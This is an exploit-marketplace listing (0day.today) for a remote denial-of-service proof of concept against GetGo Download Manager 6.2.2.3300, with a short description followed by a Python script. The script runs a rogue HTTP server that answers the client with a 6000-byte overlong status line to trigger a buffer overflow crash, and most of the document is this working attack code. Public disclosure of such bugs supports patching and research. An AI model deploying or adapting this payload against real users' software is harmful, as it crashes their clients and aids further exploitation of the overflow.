[ 承認 ] [ 登録 ] [ アカウントの復元 ]
お問い合わせ
次の方法でご連絡することができます:
0day.today  Inj3ct0rエクスプロイト市場とエクスプロイトの危険は,データベースを利用します

GetGo Download Manager 6.2.2.3300 - Denial of Service Exploit

著者
Malav Vyas
リスク
[
セキュリティリスクミディアム
]
0day-ID
0day-ID-33124
カテゴリ
dos / poc
日付の追加
16-08-2019
プラットフォーム
windows
# Exploit Title : GetGo Download Manager 6.2.2.3300 - Denial of Service
# Author - Malav Vyas
# Vulnerable Software: GetGo Download Manager 6.2.2.3300
# Vendor Home Page: www.getgosoft.com
# Software Link: http://www.getgosoft.com/getgodm/
# Tested On: Windows 7 (64Bit), Windows 10 (64Bit)
# Attack Type : Remote
# Impact : DoS
# Co-author - Velayuthm Selvaraj

# 1. Description
# A buffer overflow vulnerability in GetGo Download Manager 6.2.2.3300 and 
# earlier could allow Remote NAS HTTP servers to perfor DOS via a long response.

# 2. Proof of Concept

import socket
from time import sleep
host = "192.168.0.112"
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
sock.listen(1)
print "\n[+] Listening on %d ..." % port

cl, addr = sock.accept()
print "[+] Connected to %s" % addr[0]
evilbuffer = "A" * 6000
    
buffer = "HTTP/1.1 200 " + evilbuffer + "\r\n"

print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(30)
cl.close()
sock.close()

#  0day.today [2024-07-01]  #